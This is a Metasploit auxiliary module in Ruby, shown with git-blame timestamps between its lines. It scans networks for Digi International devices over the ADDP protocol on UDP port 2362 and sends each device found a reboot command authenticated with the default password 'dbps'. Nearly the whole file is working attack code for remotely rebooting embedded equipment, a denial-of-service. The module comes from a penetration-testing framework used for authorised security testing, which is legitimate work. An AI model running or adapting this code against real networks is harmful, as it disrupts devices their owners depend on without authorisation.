2012-10-29 04:04:18 +00:00
|
|
|
##
|
2013-10-15 18:50:46 +00:00
|
|
|
# This module requires Metasploit: http//metasploit.com/download
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2012-10-29 04:04:18 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
require 'rex/proto/addp'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Auxiliary
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Auxiliary::Report
|
|
|
|
include Msf::Auxiliary::UDPScanner
|
2012-10-29 04:04:18 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def initialize
|
|
|
|
super(
|
|
|
|
'Name' => 'Digi ADDP Remote Reboot Initiator',
|
|
|
|
'Description' => 'Reboot Digi International based equipment through the ADDP service',
|
|
|
|
'Author' => 'hdm',
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
['URL', 'http://qbeukes.blogspot.com/2009/11/advanced-digi-discovery-protocol_21.html'],
|
|
|
|
['URL', 'http://www.digi.com/wiki/developer/index.php/Advanced_Device_Discovery_Protocol_%28ADDP%29'],
|
|
|
|
],
|
|
|
|
'License' => MSF_LICENSE
|
|
|
|
)
|
2012-10-29 04:04:18 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
Opt::RPORT(2362),
|
|
|
|
OptString.new('ADDP_PASSWORD', [true, 'The ADDP protocol password for each target', 'dbps'])
|
|
|
|
], self.class)
|
|
|
|
end
|
2012-10-29 04:04:18 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def scanner_prescan(batch)
|
|
|
|
print_status("Finding ADDP nodes within #{batch[0]}->#{batch[-1]} (#{batch.length} hosts)")
|
|
|
|
@results = {}
|
|
|
|
end
|
2012-11-08 12:40:32 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def scan_host(ip)
|
|
|
|
Rex::Proto::ADDP.request_config_all.each do |pkt|
|
|
|
|
scanner_send(pkt, ip, datastore['RPORT'])
|
|
|
|
end
|
|
|
|
end
|
2012-10-29 04:04:18 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def scanner_postscan(batch)
|
|
|
|
queue = {}
|
|
|
|
@results.each_pair do |ip,res|
|
|
|
|
queue[ip] = res
|
|
|
|
end
|
2012-10-29 04:04:18 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
@results = {}
|
2012-10-29 04:04:18 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
queue.each_pair do |ip, res|
|
|
|
|
info = Rex::Proto::ADDP.reply_to_string(res)
|
|
|
|
print_status("#{ip}:#{datastore['RPORT']} Sending reboot request to device with MAC #{res[:mac]}...")
|
|
|
|
pkt = Rex::Proto::ADDP.request_reboot(res[:magic], res[:mac], datastore['ADDP_PASSWORD'])
|
|
|
|
scanner_send(pkt, ip, datastore['RPORT'])
|
|
|
|
end
|
2012-10-29 04:04:18 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
# Wait for the final replies to trickle in
|
|
|
|
scanner_recv(10) if queue.length > 0
|
|
|
|
end
|
2012-10-29 04:04:18 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def scanner_process(data, shost, sport)
|
|
|
|
@results[shost] ||= {}
|
|
|
|
@results[shost] = Rex::Proto::ADDP.decode_reply(data)
|
2012-10-29 04:04:18 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
if @results[shost][:cmd] == Rex::Proto::ADDP::CMD_REBOOT_REP
|
|
|
|
print_status("#{shost}:#{sport} Reboot Status: " + Rex::Proto::ADDP.reply_to_string(@results[shost]))
|
|
|
|
end
|
|
|
|
end
|
2012-10-29 04:04:18 +00:00
|
|
|
|
|
|
|
end
|